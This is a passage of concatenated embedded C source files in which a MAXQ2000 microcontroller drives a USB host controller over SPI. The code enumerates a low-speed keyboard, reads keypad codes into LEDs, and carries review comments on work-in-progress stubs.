// dummy = rreg(rHIRQ);
// EIF1_bit.IE12 = 0;
}
else if ( 0x00 ) // No valid interrupt
{
FLAG = -1;
// Reset the uProc interrupt
//EIF1_bit.IE12 = 0;
// Exit the ISR
// return;
}
} // if(INTERRUPT)
EIF1_bit.IE12 = 0;
} // end if( EIF1_bit.IE12 )
} // end ISR
*/
#endif // HOST
#endif
<file_sep>/My Code/connect_test2/a1/connect_test.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Host or peripheral? - define only one.
#define HST
//#define PER
// Low or Full Speed? - define only one.
//#define HS
#define LS
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
#define TEMP
#include <stdlib.h>
#include <stdio.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
int CONNECT = -1;
//int host_send_data( unsigned char c, DEVICE *device );
//int host_recv_data( DEVICE *device );
// This will be an array of configured devices
// to accomodate one hub and one connected device
// DEVICE *this_device = NULL;
// this_device = malloc( sizeof( DEVICE ));
// if ( this_device == NULL) exit( 1 );
// prototypes in this module
int ConnectStatus( void );
void Read_Keypad(void);
//********************
///////////////////////////////////////////////////
// Host-mode demo loop:
//   * initialize the controller and sample the bus state once (J/K/SE0),
//   * open a DEVICE object when a connect state is seen, close it on SE0,
//   * otherwise service the attached keypad via Read_Keypad().
// NOTE(review): NEXT is only assigned once before the loop; re-detection of
// connect/disconnect relies on something else (an ISR?) updating the global
// NEXT, but the ISR in usb.c is currently commented out -- confirm.
main()
{
    ///// Declare Variables Here ///////////////////////
    //
    //// static BYTE dum, result, dum1;
    static DEVICE *my_device = NULL;
    ///////////////////////////////////////////////////
    Host_Init();
    ///// Your Code Here //////////////////////////////
    wreg(rHCTL,0x04);               // Sample the USB bus
    CURRENT = -1;
    NEXT = (rreg(rHRSL) & 0xC0);    // keep only the JSTATUS/KSTATUS bits
    timeDELAY(500);                 // a delay
    while(1)
    {
        // Wait for a device to connect
        /* switch( Connect_Device( this_device ) )
        {
        case 1: // Configure LS Peripheral and drop out to Read_Keypad()
            // HOST_LS
            // Configure_Device( this_device[x], addr[2], conf1, idle );
            //my_device++;
            break;
        case 2: // Configure FS Peripheral and drop out to Read_Keypad()
            // HOST_FS
            // Configure_Device( this_device[x], addr[4], conf1, idle );
            //my_device++;
            break;
        case 3: // Configure Hub and go back to wait for device to connect
            // HOST_FS
            // my_hub = this_device[x];
            // Configure_Hub( my_hub, addr[6], ... );
            // x++;
            break;
        default: // No Device
            //x = 0;
            break;
        } // end switch()
        */
        if ( CURRENT != NEXT )
        {
            CURRENT = NEXT;
            // wreg(rHIEN,0x00);
            switch ( CURRENT )
            {
            case 0x00 :             // SE0 - EOP or disconnect
                // PO0 = 0xCC;      // MAXQ:
                // if ( my_device != NULL )
                Close_Device( my_device );
                // free(my_device);
                // my_device = NULL;
                // status = 0;
                break;
            case bmKSTATUS :        // K STATE
                // PO0 = 0xC0;      // MAXQ:
                // NOTE(review): usb.h prototypes Open_Device(void); it is
                // called here with addr4 -- confirm the prototype is stale.
                my_device = Open_Device( addr4 );
                if ( my_device == NULL )
                {
                    printf( "Failed to create the device!\n" );
                    exit( 1 );
                }
                // this_device = my_device;
                // Configure_Device( my_device, addr4, conf1, idle );
                // status = 1;
                break;
            case bmJSTATUS :        // J STATE
                // PO0 = 0x0C;      // MAXQ:
                my_device = Open_Device( addr4 );
                if ( my_device == NULL )
                {
                    printf( "Failed to create the device!\n" );
                    exit( 1 );
                }
                // Configure_Device( my_device, addr4, conf1, idle );
                // this_device = my_device;
                // status = 2;
                break;
            default :               // neither SE0, J, nor K: error
                break;
            } // end switch ( CURRENT )
            wreg(rHIEN,bmCONNIRQ);  // re-arm the connect-change interrupt
        } // end if( CURRENT != NEXT )
        // add a test to determine...
        // if(my_device == hub) status = 3;
        // No device, restart loop
        if( my_device == NULL ) continue;
        ////////// SERVICE THE DEVICE HERE /////////////////////////////////////
        Read_Keypad();
        // dum=rreg(rHRSL);
        // result = CONNECT;
        ////////////////////////////////////////////////////////////////////////
    } // end while(1)
} // End of main(void)
// Poll the attached keyboard's interrupt IN endpoint (EP1) and echo keypad
// digits to the LED port (PO0).  Loops until a connection-change flag
// (bmCONNIRQ) appears in the global FLAG, i.e. the connect state changes.
void Read_Keypad(void)
{
    static BYTE HR, rxnum, newkey;
    static BYTE KB_data[8];             // 8-byte boot-protocol input report

    wreg(rHCTL,bmRCVTOG0);              // very first data toggle should be DATA0
    while( !(FLAG & bmCONNIRQ) )
    {
        waitframes(10);                 // pace the IN polls
        wreg(rHXFR,0x01);               // send an IN token to EP1 (OUTNIN=0)
        HR = Wait_for_HIRQ(bmHXFRDNIRQ);    // this also clears the IRQ bit
        switch(HR)
        {
        case hrNAK:                     // device had no new report this poll
            L8_ON
            break;
        case hrSUCCESS:                 // get the KB packet
            rxnum = rreg(rRCVBC);
            TRIG_HI                     // scope pulse brackets the 8-byte read
            readbytes(rRCVFIFO,rxnum,KB_data);  // read "rxnum" bytes from the RCVFIFO
            TRIG_LO
            // BUGFIX: in a boot-protocol keyboard report the first keycode is
            // byte 2 (byte 0 = modifiers, byte 1 = reserved).  The old code
            // read byte 0 via *KB_data even though its own comment said
            // "keycode is in the third byte".
            newkey = KB_data[2];
            if(newkey == 0)             // turn off the LEDS when keys are up
                PO0=0;                  // (comment out this test to latch keys in LEDS)
            else if (newkey >= 0x59 && newkey <= 0x62)  // HID usages 0x59..0x62 = Keypad 1..Keypad 0
                PO0 = newkey - 0x58;    // show it in the LEDS (0 shows as 0x0A)
            break;
        default:                        // any other completion code is an error
            break;
        }   // end switch(HR)
    }   // end while()
}
#endif
<file_sep>/My Code/interface.c
// interface.c
// SPI specific to the MAXQ board implementation
//
//
#ifndef INTERFACE_C
#define INTERFACE_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\interface.h"
#include "RT53reg.h"
#define MSB(word) (BYTE)(((WORD)(word) >> 8) & 0xff)
#define LSB(word) (BYTE)((WORD)(word) & 0xff)
#define CS_HI PO5 |= 0x10;
#define CS_LO PO5 &= ~0x10;
#define SCK_HI PO5 |= 0x40; // PO6
#define SCK_LO PO5 &=~0x40;
#define DRIVE PD5 |= 0x20; // set direction to 1 (out)
#define FLOAT PD5 &=~0x20;
#define TRIG_HI PO7 = 0x01; // MAXQ P70
#define TRIG_LO PO7 = 0x00;
// Functions
// Mirror the pushbutton states (active-low, upper nibble) of both GPIO
// registers onto the LED bits (lower nibble) of the same registers.
void update_lites(void)
{
    BYTE buttons;

    buttons = ~rreg(rGPIO);     // invert so a pressed button reads as 1
    buttons >>= 4;              // move the button nibble down to the LED bits
    wreg(rGPIO,buttons);

    buttons = ~rreg(21);        // same treatment for the second IOPINS register
    buttons >>= 4;
    wreg(21,buttons);
}
/*
BYTE Check_INT(void) // returns 0 if nothing pending, nonzero if something pending
{
// neg-level
// return ~PI6 & 0x01; // Return complement of level on P60 pin
// pos or neg edge (initialization sets edge polarity)
if(EIF1_bit.IE12) // Test the IRQ Flag
{
EIF1_bit.IE12 = 0; // It's set--clear it
return(1); // show an IRQ is active
}
else return(0); // flag=0: no IRQ active
}
*/
/////////////////////////////////////////////////////////////////
/////////////////////// SPI Functions ///////////////////////////
/////////////////////////////////////////////////////////////////
// Configure the MAXQ2000's SPI peripheral as the bus master used to talk to
// the USB controller: CS/SCLK/DOUT as outputs, DIN as input, mode(0,0),
// 16-bit frames, CS# idle high.
void SPI_Init(void)
{
    // MAXQ2000 SPI port
    // CKCN = 0x00;         // system clock divisor is 1
    PD5 |= 0x070;           // Set SPI output pins (CS, SCLK, DOUT) as output.
    PD5 &= ~0x080;          // Set SPI input pin (DIN) as input.
    //
    // SPICK = 0x00;        // fastest SPI clock--div by 2
    SPICK = 0x02;           // SPI clock divisor -- NOTE(review): the original
                            // "div by 2" comment was copied from the 0x00
                            // setting above; confirm the actual rate for 0x02.
    SPICF = 0x00;           // mode(0,0), 8 bit data
    SPICN_bit.MSTM = 1;     // Set Q2000 as the master.
    SPICN_bit.SPIEN = 1;    // Enable SPI
    SPICF_bit.CHR = 1;      // Set SPI to 16-bit mode.
    CS_HI                   // CS# high (slave deselected)
}
// SPI Send Byte Function
// Purpose: Send one BYTE of data to the RT99 via the SPI interface and wait for xfer to complete.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable contains any BYTE data to be written to the RT99.
// Postcondition: The argument value is written to the SPI port and the proper amount of delay is
// allowed for the transfer. Invalid returned data is discarded.
//void SENDBYTE(int x){ SPIB = x; while(SPICN_bit.STBY); SPIB; }
// Shift one SPI frame out and wait for completion; returns whatever the
// slave clocked back in during the same frame.  The name is historical --
// with CHR=1 (set by the callers) the frame is 16 bits wide.
__monitor WORD sendBYTE(WORD x )
{
    // SPICF_bit.CHR = 1;   // Set SPI to 16-bit mode. (callers set this)
    SPIB = x;               // Load the data to send
    while(SPICN_bit.STBY);  // Loop until the data has been sent.
    //SPIB;
    SPICN_bit.SPIC = 0;     // Clear the SPI transfer complete flag.
    return SPIB;            // the word shifted in from the slave
}
// SPI Read Register Function
// Purpose: Takes a BYTE value as an argument that represents a RT99 register address
// and allows proper delay for the data to be returned from the RT99 in that register address.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable must contain a hex value of a valid RT99 register address.
// Postcondition: SPIB contains the data returned from the RT99.
// Read one controller register over SPI: a single 16-bit frame carries the
// command (register number in the 5 MSBs, direction bit b1=0 for read) and
// clocks the register data back in.
__monitor WORD rreg(WORD reg)
{
    SPICF_bit.CHR = 1;      // 16-bit SPI frame: command + data in one shot
    CS_LO
    sendBYTE( 0x0000 | (reg<<11) ); // bit1 0=read, bit7-bit3 register address value. [b2 is filler]
    CS_HI
    return SPIB;            // return the word shifted in during the frame
}
// SPI Write Register Function
// Purpose: Takes a WORD value as an argument that represents a RT99 register address
// and one BYTE of data and writes a BYTE value to the RT99 register address.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable must contain a hex value of a valid RT99 register address.
// Postcondition: The RT99 register has been written with the data BYTE.
// Write one byte to a controller register over SPI: a single 16-bit frame
// holding the register number, the write direction bit (0x0200), and the
// data byte.
__monitor void wreg(WORD reg, BYTE dat)
{
    SPICF_bit.CHR = 1;      // 16-bit SPI frame
    CS_LO
    // Combine write command, register and data and send.
    sendBYTE( 0x0200 | (reg<<11) | (WORD)dat );
    CS_HI
}
// Burst-read N bytes from controller register "reg" into *p using 8-bit SPI
// frames within one chip-select.  The dummy read of SPIB after the command
// byte is required to re-arm the receive buffer in byte mode.
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p)
{
    static BYTE j;
    SPICF_bit.CHR = 0;      // Set SPI to 8-bit mode.
    CS_LO
    SPIB = reg<<3;          // write bit b1=0 to command a read operation
    while(SPICN_bit.STBY);  // loop if data still being sent
    j = SPIB;               // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
    for(j=0; j<N; j++)
    {
        SPIB = 0x00;        // dummy value to clock in the next read byte
        while(SPICN_bit.STBY);  // loop if data still being received
        *p = SPIB;          // store it in the data array
        p++;                // bump the pointer
    }
    CS_HI
    // SPICN_bit.SPIC = 0;  // Clear the SPI transfer complete flag.
}
// Near-duplicate of readbytes(); differs only in that the SPI-complete flag
// is cleared before raising CS# and the dummy read result is discarded.
// NOTE(review): consider consolidating the two variants.
__monitor void ReadBytes(BYTE reg, BYTE N, BYTE *p)
{
    static BYTE j;
    SPICF_bit.CHR = 0;      // Set SPI to 8-bit mode.
    CS_LO
    SPIB = reg<<3;          // write bit b1=0 to command a read operation
    while(SPICN_bit.STBY);  // loop if data still being sent
    SPIB;                   // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
    for(j=0; j<N; j++)
    {
        SPIB = 0x00;        // dummy value to clock in the next read byte
        while(SPICN_bit.STBY);  // loop if data still being received
        *p = SPIB;          // store it in the data array
        p++;                // bump the pointer
    }
    SPICN_bit.SPIC = 0;     // Clear the SPI transfer complete flag.
    CS_HI
}
// Burst-write N bytes from a read-only buffer into controller register
// "reg" within one chip-select frame (8-bit SPI mode).
__monitor void WriteBytes(BYTE reg, BYTE N, const BYTE *p)
{
    BYTE i;

    SPICF_bit.CHR = 0;      // switch the SPI engine to 8-bit frames
    CS_LO
    SPIB = (reg<<3)+2;      // command byte: register number with write bit (b1) set
    while(SPICN_bit.STBY);  // wait for the command byte to shift out
    for(i = 0; i < N; i++)
    {
        SPIB = p[i];        // clock out the next payload byte
        while(SPICN_bit.STBY);
    }
    CS_HI
}
// Burst-write N bytes into controller register "reg" (8-bit SPI mode).
// NOTE(review): duplicate of WriteBytes() except the source pointer is
// non-const and the locals are static -- consider consolidating.
__monitor void writebytes(BYTE reg, BYTE N, BYTE *p)
{
    static BYTE j,wd;
    SPICF_bit.CHR = 0;      // Set SPI to 8-bit mode.
    CS_LO
    SPIB = (reg<<3)+2;      // write bit b1=1 to command a write operation
    while(SPICN_bit.STBY);  // loop if data still being sent
    for(j=0; j<N; j++)
    {
        wd = *p;            // fetch the next byte
        SPIB = wd;          // and clock it out
        while(SPICN_bit.STBY);  // loop if data still being sent
        p++;                // bump the pointer
    }
    CS_HI
}
/*
// Read a register, return its value.
BYTE rreg(BYTE reg)
{
BYTE dum;
CS_LO
SPIB = reg<<3; // reg number w. dir=0 (IN)
while(SPICN_bit.STBY); // loop if data still being sent
dum = SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
SPIB=0x12; // data is don't care, we're clocking in MISO bits
while(SPICN_bit.STBY); // loop if data still being sent
CS_HI
return(SPIB);
}
*/
/*
void wreg(BYTE reg, BYTE dat)
{
CS_LO // Set CS# low
SPIB = (reg<<3)+2; // send the register number with the DIR bit (b1) set to WRITE
while(SPICN_bit.STBY); // loop if data still being sent
SPIB = dat; // send the data
while(SPICN_bit.STBY); // loop if data still being sent
CS_HI // set CS# high
// SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
}
*/
#endif // INTERFACE_C
<file_sep>/My Code/read_bytes/read_bytes.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Host or peripheral? - define only one.
#define HST
//#define PER
// Low or Full Speed? - define only one.
//#define HS
#define LS
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
#define TEMP
#include <stdlib.h>
#include <stdio.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
//#include "..\interface.c" // SPI/I2C Implementation
//#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
// Read N bytes from RT99 register 'reg' into *p, keeping a debug shadow copy
// of the first bytes read in the static p2[] array.
// FIX: p2[] holds only 8 bytes but N may be larger (main() calls with N=10),
// so the unconditional "p2[j] = ..." overflowed the static buffer. The shadow
// store is now bounds-checked; the caller's buffer still receives all N bytes.
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p)
{
static BYTE j,k;
static BYTE p2[8]; // debug shadow of the first 8 bytes read
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = reg<<3; // write bit b1=0 to command a read operation
while(SPICN_bit.STBY); // loop if data still being sent
k = SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
for(j=0; j<N; j++)
{
SPIB = 0x00; // dummy value to get the next read byte
while(SPICN_bit.STBY); // loop if data still being received
*p = SPIB; // store it in the data array
if (j < 8)
p2[j] = *p; // shadow copy, bounded to the size of p2[]
p++; // bump the pointer
}
CS_HI
// SPICN_bit.SPIC = 0; // Clear the SPI transfer complete flag.
}
///////////////////////////////////////////////////
main()
{
///// Declare Variables Here ///////////////////////
//
int rxnum = 10;
int KB_data[8];
///////////////////////////////////////////////////
SPI_Init();
Host_Init();
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,address); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,config); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
///// Your Code Here //////////////////////////////
while(1)
{
readbytes(rRCVFIFO,rxnum,KB_data); // read "rxnum" bytes from the RCVFIFO
}
////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////
} // End of main(void)
#endif
<file_sep>/My Code/usb.c
#ifndef USB_C
#define USB_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\usb.h"
#include "..\interface.c"
#include "RT53reg.h"
static DEVICE *device = NULL; // device currently being enumerated at address 0 (used by the ISR)
// Mode register macros
#define HOST_LS_THRUHUB wreg(rMODE,0xCF); // DPPD,DMPD,KAENAB,HUBRPE,LOWSPEED,HOST
#define HOST_LS wreg(rMODE,0xCB); // as above but HUBPRE=0
#define HOST_FS wreg(rMODE,0xC9); // as HOST_LS but LOWSPEED=0
//
// FIX: the *_OFF macros used logical NOT (!bmXXX), which evaluates to 0 for any
// nonzero mask, so "reg & !bm" cleared EVERY enable bit instead of just one.
// Bitwise complement (~) -- as already used by CLRBIT below -- is required.
#define SUSPEND_INT_ON wreg(rUSBIEN,(rreg(rUSBIEN) | bmSUSPEND));
#define SUSPEND_INT_OFF wreg(rUSBIEN,(rreg(rUSBIEN) & ~bmSUSPEND));
#define BUSACT_INT_ON wreg(rUSBIEN,(rreg(rUSBIEN) | bmBUSACT));
#define BUSACT_INT_OFF wreg(rUSBIEN,(rreg(rUSBIEN) & ~bmBUSACT));
#define SETBIT(reg,val) wreg(reg,(rreg(reg)|val));
#define CLRBIT(reg,val) wreg(reg,(rreg(reg)&~val));
//
#define STALL_EP0 wreg(9,0x23); // Set all three EP0 stall bits--data stage IN/OUT and status stage
// Initialize the MAXQ2000 SPI master and put the RT53 USB controller into
// low-speed host mode, then wire the RT53 INT pin to MAXQ2000 INT12 and
// enable interrupts. Call once at startup before any USB traffic.
void Host_Init( void )
{
// MAXQ2000 SPI port as a master
SPI_Init();
// disable interrupt pin
wreg(rCPUCTL, 0x00);
// disable all interrupt
wreg(rUSBIEN,0x00);
wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 );
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
wreg(rPINCTL,(bmFDUPSPI));
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ: show chip revision on the LED bar
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 1; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// MAXQ: enable interrupts
__enable_interrupt();
// Enable interrupt pin
wreg(rCPUCTL, bmIE);
}
/*
int Connect_Device( DEVICE * my_device )
{
static int status;
if ( CURRENT != NEXT )
{
CURRENT = NEXT;
switch ( CURRENT )
{
case 0x00 : // SE0 - EOP or disconnect
if ( my_device != NULL )
Close_Device( my_device );
// free(my_device);
// my_device = NULL;
// status = 0;
break;
case bmKSTATUS : // K STATE
///////////////////////////////////////////////////
my_device = Open_Device();
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// this_device = my_device;
// Configure_Device( my_device, addr4, conf1, idle );
///////////////////////////////////////////////////
// status = 1;
break;
case bmJSTATUS : // J STATE
// PO0 = 0x0C; // MAXQ:
///////////////////////////////////////////////////
my_device = Open_Device();
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// Configure_Device( my_device, addr4, conf1, idle );
// this_device = my_device;
///////////////////////////////////////////////////
status = 2;
break;
default : // error
break;
} // end switch ( CURRENT )
wreg(rHIEN,bmCONNIRQ);
} // end if( CURRENT != NEXT )
// add a test to determine...
// if(my_device == hub) status = 3;
return status;
}
*/
// PURPOSE: This function creates a DEVICE object to store information related to
// the device currently at address 0 on the USB bus.
// PRECONDITIONS: This device was just plugged into the USB bus.
// POSTCONDITIONS: This device will be in DEFAULT mode, the Device and Interface
// descriptors will be store in the fields of the DEVICE object "my_device."
// This function will initialize the global "device" pointer to be used by the ISR
// while this device is at address zero.
// ARGUMENTS: None.
// RETURNED: Pointer to the device object.
DEVICE *Open_Device( void )
{
DEVICE *my_device;
my_device = malloc( sizeof( DEVICE ));
if ( my_device == NULL)
return( NULL );
device = my_device;
timeDELAY(5000);
// Reset the USB device to default state
Bus_Reset();
// waitframes(8);
// Bus_Reset();
//
waitframes(10);
//Standard_Request(SR_GET_DESCRIPTOR, GD_DEVICE, device);
//Standard_Request(SR_GET_DESCRIPTOR, GD_CONFIGURATION, device);
//Standard_Request(SR_GET_DESCRIPTOR, GD_INTERFACE, device);
return( my_device );
}
// PURPOSE: Assign the freshly attached device USB address 4, select
// configuration 1 and issue a HID Set_Idle request.
// PRECONDITIONS: The USB device is in the default state and the host is fully
// configured. The descriptors have been read from the USB device and stored in the
// appropriate fields in the my_device object.
// POSTCONDITIONS: The USB device has been assigned a unique address. Based upon the
// configuration data read in the Open_Device() function and stored in my_device, the
// device has been configured.
// ARGUMENTS: my_device plus the address/config/idle setup packets.
// NOTE(review): the address/config/idle parameters are currently UNUSED (the
// assignments below are commented out); hard-coded local packets are sent
// instead -- confirm whether the parameters should replace them.
// RETURNS: None; HR1-HR3 (globals) receive the host result codes.
void Configure_Device( DEVICE *my_device,
const SUD address,
const SUD config,
const SUD idle)
{
static BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
static BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
static BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
//my_device->address = address;
//my_device->config = config;
//my_device->idle = idle;
timeDELAY(5000);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,Set_Addr4); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,Set_Config1); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,Set_Idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
// Check here to see if the device is a hub; if so, configure the hub and return 1
timeDELAY(100);
}
// Host
// PURPOSE: Configure an attached hub: send the supplied Set_Address,
// Set_Config and Set_Idle setup packets to it (address 0, then address 4).
// PRECONDITIONS: Hub attached and in default state; host initialized.
// POSTCONDITIONS: HR1-HR3 (globals) receive the host result codes.
// ARGUMENTS: my_device (currently unused here) and the three setup packets,
// each 8 bytes, passed directly to WriteBytes().
// RETURNS: None.
void Configure_Hub( DEVICE *my_device,
const SUD address,
const SUD config,
const SUD idle)
{
//
waitframes(4);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,address); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,config); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
// Check here to see if the device is a hub; if so, configure the hub and return 1
}
// Host
// PURPOSE: This function destroys the DEVICE object and frees the memory used by
// a device that was unplugged from the USB bus.
// PRECONDITIONS: A DEVICE object existed containing the data for a device.
// POSTCONDITION: The memory allocated for the device is freed.
// ARGUMENTS: A pointer to the DEVICE object of the disconnected device (NULL allowed).
// RETURNS: None.
void Close_Device( DEVICE *my_device )
{
// free() accepts NULL, so no guard is needed. The original also nulled a
// LOCAL copy of the pointer, which had no effect on the caller's pointer;
// callers remain responsible for not reusing their pointer after this call.
free(my_device);
}
// PURPOSE: Issue a USB bus reset and block until the controller signals that
// the (50 msec) reset is complete.
// PRECONDITIONS: Host mode, SPI configured.
// POSTCONDITIONS: The attached device is in its default state; the previously
// enabled host interrupts are restored.
// ARGUMENTS: None.
// RETURNS: None.
void Bus_Reset(void)
{
static BYTE temp;
temp = rreg( rHIEN ); // save currently enabled host IRQs
wreg( rHIEN, bmBUSEVENTIE | temp ); // enable the reset done irq
wreg( rHCTL, bmBUSRST ); // initiate the 50 msec bus reset
Wait_for_HIRQ( bmBUSEVENTIRQ ); // wait for, and then clear this interrupt
wreg( rHIEN, temp ); // restore ints
}
// PURPOSE: Issue a USB bus resume and block until the controller signals that
// the (20 msec) resume sequence is complete.
// PRECONDITIONS: Host mode, SPI configured; bus previously suspended.
// POSTCONDITIONS: Bus resumed; previously enabled host interrupts restored.
// ARGUMENTS: None.
// RETURNS: None.
void Bus_Resume(void)
{
static BYTE temp;
temp = rreg( rHIEN ); // save currently enabled host IRQs
wreg( rHIEN, bmBUSEVENTIE | temp ); // enable the reset done irq
wreg(rHCTL,bmBUSRSM); // initiate the 20 msec bus resume
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for, and then clear this interrupt
wreg( rHIEN, temp ); // restore ints
}
// PURPOSE: This resets the MAX3420E/MAX3421E by pulsing the chip-reset bit
// in rUSBCTL, with fixed settle delays before and after release.
// PRECONDITIONS: SPI interface configured.
// POSTCONDITIONS: Chip reset released; register state is at power-on defaults.
// ARGUMENTS: time -- NOTE(review): currently unused; the delays are hard-coded
// to 500/2000 timeDELAY units. Confirm whether 'time' was meant to scale them.
// RETURNS: None.
void Reset_MAX(int time) // applies to MAX3420E or MAX3421E
{
wreg( rUSBCTL, 0x20 ); // chip reset
timeDELAY( 500 ); // a delay
wreg( rUSBCTL, 0x00 ); // remove the reset
timeDELAY( 2000 ); // a delay
}
// Host
// PURPOSE: Dispatch a standard USB request code. Every individual handler is
// currently stubbed out, so the function only validates the request code.
// PRECONDITIONS: None.
// POSTCONDITIONS: None (no handler is invoked yet).
// ARGUMENTS: request_code - SR_* standard request; descriptor_type - reserved
// for the (stubbed) descriptor handlers; my_device - device being serviced.
// RETURNS: my_device for any recognized request code, NULL otherwise.
DEVICE *Standard_Request(BYTE request_code, BYTE descriptor_type, DEVICE * my_device)
{
// All recognized codes share one (stubbed) path; re-introduce per-case
// handler calls as they are implemented.
switch ( request_code )
{
case SR_GET_STATUS: // Get_Status(my_device);
case SR_CLEAR_FEATURE: // Clear_Feature(my_device);
case SR_RESERVED:
case SR_SET_FEATURE: // Set_Feature(my_device);
case SR_SET_ADDRESS: // Set_Address(my_device);
case SR_GET_DESCRIPTOR: // Get_Descriptor(descriptor_type, my_device);
case SR_SET_DESCRIPTOR: // Set_Descriptor(descriptor_type, my_device);
case SR_GET_CONFIGURATION: // Get_Configuration(my_device);
case SR_SET_CONFIGURATION: // Set_Configuration(my_device);
case SR_GET_INTERFACE: // Get_Interface(my_device);
case SR_SET_INTERFACE: // Set_Interface(my_device);
return my_device;
default:
return NULL;
}
}
// PURPOSE: Stub -- intended to issue a standard GET_CONFIGURATION request for
// my_device. Not yet implemented (body intentionally empty).
// PRECONDITIONS: None.
// POSTCONDITIONS: None.
// ARGUMENTS: my_device - device to query (currently ignored).
// RETURNS: None.
void Get_Configuration(DEVICE *my_device)
{
}
// Host, Address/Configured
// PURPOSE: Stub -- intended to issue a standard SET_CONFIGURATION request for
// my_device. Not yet implemented (body intentionally empty).
// PRECONDITIONS: None.
// POSTCONDITIONS: None.
// ARGUMENTS: my_device - device to configure (currently ignored).
// RETURNS: None.
void Set_Configuration(DEVICE *my_device)
{
}
// Host, Default/Address
// PURPOSE: Issue a standard SET_ADDRESS request to the device at address 0.
// ARGUMENTS: addr - the new USB address to assign.
// RETURNS: the CTL_WRITE() host result code (0 = success).
BYTE Set_Address(BYTE addr)
{
BYTE sud[8];
BYTE i;
sud[0] = 0x00; // bmRequestType: OUT, standard, to device
sud[1] = 0x05; // bRequest: SET_ADDRESS
sud[2] = addr; // wValueL: the new address
sud[3] = 0x00; // wValueH
sud[4] = 0x00; // wIndexL
sud[5] = 0x00; // wIndexH
sud[6] = 0x00; // wLengthL
sud[7] = 0x00; // wLengthH
for (i = 0; i < 8; i++)
